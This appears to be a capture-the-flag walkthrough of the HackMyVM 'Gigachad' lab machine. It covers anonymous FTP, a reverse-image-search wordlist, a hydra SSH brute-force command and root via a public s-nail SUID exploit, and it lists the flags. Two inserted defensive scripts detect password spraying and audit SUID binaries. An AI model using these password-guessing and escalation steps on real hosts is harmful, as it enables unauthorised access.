HackMyVM | Gigachad

In this walkthrough, I demonstrate how I obtained complete ownership of Gigachad from HackMyVM.
In: HackMyVM, Attack, CTF, Home Lab, Linux, Easy Challenge
ℹ️
I keep all of my distrusted hosts from platforms like HackMyVM on a segmented VLAN -- 10.9.9.0/24 -- that has no internet access.

Nmap Results

# Nmap 7.98 scan initiated Fri Feb  6 20:22:02 2026 as: /usr/lib/nmap/nmap -Pn -p- --min-rate 2000 -sC -sV -oN nmap-scan.txt 10.9.9.17
Nmap scan report for 10.9.9.17
Host is up (0.00055s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.6.6.6
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-r-xr-xr-x    1 1000     1000          297 Feb 07  2021 chadinfo
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 6a:fe:d6:17:23:cb:90:79:2b:b1:2d:37:53:97:46:58 (RSA)
|   256 5b:c4:68:d1:89:59:d7:48:b0:96:f3:11:87:1c:08:ac (ECDSA)
|_  256 61:39:66:88:1d:8f:f1:d0:40:61:1e:99:c5:1a:1f:f4 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
| http-robots.txt: 1 disallowed entry 
|_/kingchad.html
|_http-title: Site doesn't have a title (text/html).
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Feb  6 20:22:15 2026 -- 1 IP address (1 host up) scanned in 13.02 seconds
💡
Don't miss an opportunity to find some breadcrumbs in the initial nmap scan output. Notice that the FTP server allows anonymous login on tcp/21 and there's a file called chadinfo. There's also a /kingchad.html entry in robots.txt on the HTTP server on tcp/80.
echo -e '10.9.9.17\t\tgigachad.hmv' | sudo tee -a /etc/hosts

Add a hosts entry for convenience

Service Enumeration

TCP/21

Staying true to my methodology, I'll start by probing the FTP server first. As noted in the initial nmap scan, anonymous login is allowed and there should be a file called chadinfo.

ftp ftp://anonymous:@gigachad.hmv
Output mentions "/drippinchad.png"
File upload is denied

TCP/80

ℹ️
I tried using exiftool, zsteg, binwalk, and some other tools to see if there was some kind of password embedded within, but didn't have any luck. So, the next best idea was to try and do a reverse image search and find something significant about the photo.
Right-click on the image and choose "Search image with Google"
This could be a clue. I'll form a word list using some keywords from the reverse image search results.
cat << EOF > passwords.txt
maidens
maiden
tower
Maidens Tower
maidenstower
Istanbul
istanbul
Turkey
turkey
Kiz Kulesi
kiz
kulesi
kizkulesi
Leander
leander
Leanders Tower
leanderstower
tower
EOF
hydra -I -f -V -l chad -P passwords.txt ssh://gigachad.hmv

Exploit

Anonymous FTP -> SSH as Chad

  • We found a ZIP file via anonymous FTP access that included the username chad and alluded to a potential password at /drippinchad.png.
  • A reverse image search allowed us to craft a targeted word list.
  • Using public key authentication or, at a minimum, adding countermeasures against password-spraying attacks is recommended.
ssh chad@gigachad.hmv
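The last bullet recommends public-key authentication or countermeasures against password spraying. As an added example that is not from the original post, here is the defender's side of that recommendation: a small Python script that flags the burst of failed logins a spray leaves in /var/log/auth.log (Debian 10 sshd format) and reports whether an sshd_config still allows password logins. The log excerpt, the process ids, the scanner address 10.6.6.6 and both sshd_config fragments are constructed for illustration.

```python
"""Spot an SSH password spray in Debian-style auth.log lines and check
whether sshd_config still permits it.

Added example for this walkthrough; it is not part of the original post.
The log lines, the source address 10.6.6.6, the process ids and the two
sshd_config fragments below are all constructed for illustration."""
import re
from collections import defaultdict
from datetime import datetime

# Debian 10 sshd line, e.g.
# "Feb  6 20:30:01 gigachad sshd[1201]: Failed password for chad from 10.6.6.6 port 41234 ssh2"
FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+ ssh2$"
)
ACCEPTED_RE = re.compile(
    r"sshd\[\d+\]: Accepted (?P<method>\w+) for (?P<user>\S+) from (?P<ip>[\d.]+) port"
)

# Constructed auth.log excerpt: seven rapid failures from one source, then a
# password success from the same source, then one unrelated failure.
SAMPLE_LOG = """\
Feb  6 20:29:00 gigachad sshd[1190]: Server listening on 0.0.0.0 port 22.
Feb  6 20:30:01 gigachad sshd[1201]: Failed password for chad from 10.6.6.6 port 41234 ssh2
Feb  6 20:30:02 gigachad sshd[1203]: Failed password for chad from 10.6.6.6 port 41236 ssh2
Feb  6 20:30:02 gigachad sshd[1205]: Failed password for chad from 10.6.6.6 port 41238 ssh2
Feb  6 20:30:03 gigachad sshd[1207]: Failed password for chad from 10.6.6.6 port 41240 ssh2
Feb  6 20:30:04 gigachad sshd[1209]: Failed password for invalid user admin from 10.6.6.6 port 41242 ssh2
Feb  6 20:30:04 gigachad sshd[1211]: Failed password for chad from 10.6.6.6 port 41244 ssh2
Feb  6 20:30:05 gigachad sshd[1213]: Failed password for chad from 10.6.6.6 port 41246 ssh2
Feb  6 20:30:06 gigachad sshd[1215]: Accepted password for chad from 10.6.6.6 port 41248 ssh2
Feb  6 20:31:40 gigachad sshd[1301]: Failed password for chad from 10.9.9.50 port 50011 ssh2
"""

# Constructed sshd_config fragments: Debian's stock file leaves the directive
# commented out, which keeps OpenSSH's default of PasswordAuthentication yes.
WEAK_SSHD_CONFIG = """\
#PasswordAuthentication yes
ChallengeResponseAuthentication no
UsePAM yes
"""
HARDENED_SSHD_CONFIG = """\
PasswordAuthentication no
PubkeyAuthentication yes
MaxAuthTries 3
"""


def parse_failed_logins(log_text, year=2026):
    """Yield (timestamp, user, source_ip) for every failed-password line.
    syslog timestamps carry no year, so the caller supplies one."""
    for line in log_text.splitlines():
        m = FAILED_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["user"], m["ip"]


def detect_spray(log_text, threshold=5, window_seconds=60):
    """Return {source_ip: summary} for every source with at least `threshold`
    failed logins inside some `window_seconds` window. The summary records the
    total failures, the usernames tried, and whether a password login from the
    same source also succeeded, which is what a successful spray looks like."""
    attempts_by_ip = defaultdict(list)
    for ts, user, ip in parse_failed_logins(log_text):
        attempts_by_ip[ip].append((ts, user))
    password_success = set()
    for line in log_text.splitlines():
        m = ACCEPTED_RE.search(line)
        if m and m["method"] == "password":
            password_success.add(m["ip"])
    alerts = {}
    for ip, attempts in attempts_by_ip.items():
        attempts.sort()
        peak, start = 0, 0
        for end in range(len(attempts)):  # sliding window over sorted timestamps
            while (attempts[end][0] - attempts[start][0]).total_seconds() > window_seconds:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts[ip] = {
                "failures": len(attempts),
                "peak_in_window": peak,
                "users": sorted({user for _, user in attempts}),
                "password_success": ip in password_success,
            }
    return alerts


def check_sshd_config(config_text):
    """Return findings for an sshd_config: password authentication still on
    (OpenSSH's default when the directive is absent or commented out) and a
    MaxAuthTries above 3 (OpenSSH's default is 6)."""
    password_auth, max_auth_tries = "yes", 6
    for raw in config_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)
        key = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        if key == "passwordauthentication":
            password_auth = value.lower()
        elif key == "maxauthtries" and value.isdigit():
            max_auth_tries = int(value)
    findings = []
    if password_auth != "no":
        findings.append("PasswordAuthentication is not 'no'; password guessing over SSH stays possible")
    if max_auth_tries > 3:
        findings.append(f"MaxAuthTries is {max_auth_tries}; lower it to 3 or fewer")
    return findings


if __name__ == "__main__":
    for ip, summary in detect_spray(SAMPLE_LOG).items():
        print(f"{ip}: {summary}")
    print("weak config:", check_sshd_config(WEAK_SSHD_CONFIG))
    print("hardened config:", check_sshd_config(HARDENED_SSHD_CONFIG))
```

On the constructed excerpt the script reports 10.6.6.6 with seven failures in one window, two usernames tried and a subsequent password success, while the single failure from 10.9.9.50 stays below the threshold. The threshold and window are deliberately parameters: a tool like hydra can be throttled, so tune them to what normal users on the host actually produce.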

Post-Exploit Enumeration

Operating Environment

OS & Kernel

Linux gigachad 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64 GNU/Linux

PRETTY_NAME="Debian GNU/Linux 10 (buster)"
NAME="Debian GNU/Linux"
VERSION_ID="10"
VERSION="10 (buster)"
VERSION_CODENAME=buster
ID=debian
HOME_URL="https://www.debian.org/"
SUPPORT_URL="https://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"

Current User

uid=1000(chad) gid=1000(chad) groups=1000(chad)

-bash: sudo: command not found

Network Configurations

Network Interfaces

2: ens18: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether bc:24:11:64:5b:76 brd ff:ff:ff:ff:ff:ff
    inet 10.9.9.17/24 brd 10.9.9.255 scope global dynamic ens18
       valid_lft 5337sec preferred_lft 5337sec
    inet6 fe80::be24:11ff:fe64:5b76/64 scope link 
       valid_lft forever preferred_lft forever

Open Ports

tcp     LISTEN   0        80             127.0.0.1:3306          0.0.0.0:*

Interesting Files

/usr/lib/s-nail/s-nail-privsep

find / -type f -perm /4000 -exec ls -l {} \; 2>/dev/null

This SUID binary isn't one I've seen before, so I will do some more research on this.


-rwsr-xr-x 1 root root 10104 Jan  1  2016 /usr/lib/s-nail/s-nail-privsep
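An unfamiliar SUID binary like this one is exactly what a baseline comparison is meant to surface. As an added example that is not part of the original post, the Python script below parses the `ls -l` lines produced by the find command above, checks the mode bits, and reports anything not in an expected list. The s-nail line is the one shown above; the other find lines, the file sizes and the BASELINE set are constructed for illustration and are not a complete Debian 10 inventory.

```python
"""Audit the SUID/SGID files a host reports against a baseline of binaries
the distribution is expected to ship, so that an outlier such as
/usr/lib/s-nail/s-nail-privsep stands out.

Added example for this walkthrough; it is not part of the original post.
SAMPLE_FIND_OUTPUT reuses the s-nail line from the walkthrough and adds
constructed lines; BASELINE is an illustrative, incomplete set of paths."""
import sys
from dataclasses import dataclass

# Constructed output of: find / -type f -perm /4000 -exec ls -l {} \; 2>/dev/null
# (the last entry has a space in its path and is world-writable on purpose)
SAMPLE_FIND_OUTPUT = """\
-rwsr-xr-x 1 root root 63736 Jul 27  2018 /usr/bin/passwd
-rwsr-xr-x 1 root root 63568 Jan 10  2019 /bin/su
-rwsr-xr-x 1 root root 10104 Jan  1  2016 /usr/lib/s-nail/s-nail-privsep
-rwsrwxrwx 1 root root 8432 Feb  1  2026 /opt/backup/run helper
"""

# Assumed baseline: a handful of setuid programs normally shipped by Debian.
BASELINE = {
    "/usr/bin/passwd", "/usr/bin/chsh", "/usr/bin/chfn", "/usr/bin/gpasswd",
    "/usr/bin/newgrp", "/bin/su", "/bin/mount", "/bin/umount", "/bin/ping",
}


@dataclass
class SuidEntry:
    path: str
    mode: str   # the 10-character permission string, e.g. -rwsr-xr-x
    owner: str
    group: str

    @property
    def setuid(self):
        return self.mode[3] in "sS"   # 's' = setuid + owner exec, 'S' = setuid without exec

    @property
    def setgid(self):
        return self.mode[6] in "sS"

    @property
    def world_writable(self):
        return self.mode[8] == "w"


def parse_ls_line(line):
    """Parse one `ls -l` line; the path is the 9th field and may contain spaces."""
    parts = line.split(None, 8)
    if len(parts) != 9 or len(parts[0]) != 10 or not parts[0].startswith("-"):
        return None
    return SuidEntry(path=parts[8], mode=parts[0], owner=parts[2], group=parts[3])


def audit_suid(find_output, baseline=BASELINE):
    """Return [(path, reason)] for every entry that deserves a closer look."""
    findings = []
    for line in find_output.splitlines():
        entry = parse_ls_line(line)
        if entry is None:
            continue
        bits = "setuid" if entry.setuid else "setgid"
        if entry.path not in baseline:
            findings.append((entry.path, f"{bits} binary owned by {entry.owner}, not in baseline"))
        if entry.world_writable:
            findings.append((entry.path, "world-writable; any local user can replace its contents"))
        if entry.setuid and entry.mode[3] == "S":
            findings.append((entry.path, "setuid bit set without owner execute permission"))
    return findings


if __name__ == "__main__":
    # Pipe real find output in, or run with no stdin to audit the sample.
    data = SAMPLE_FIND_OUTPUT if sys.stdin.isatty() else sys.stdin.read()
    for path, reason in audit_suid(data):
        print(f"{path}: {reason}")
```

Run it as `find / -type f -perm /4000 -exec ls -l {} \; 2>/dev/null | python3 suid_audit.py` on the host being checked. On the sample it flags the s-nail helper as outside the baseline and the constructed /opt entry twice (unknown and world-writable), while passwd and su pass. In practice the baseline should be generated from a known-good install rather than typed in by hand.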

Privilege Escalation

Becoming Root

nano pwn.sh

Paste the source code from Exploit DB here, save, and exit

bash pwn.sh

Run the exploit

⚠️
I had to run the exploit multiple times. Because this exploit relies on a race condition, the first time I ran it, the race condition did not occur. The second time, it did, yielding the root shell.

Flags

User

0FAD8F4B099A26E004376EAB42B6A56A

Root

832B123648707C6CD022DD9009AEF2FD
More from 0xBEN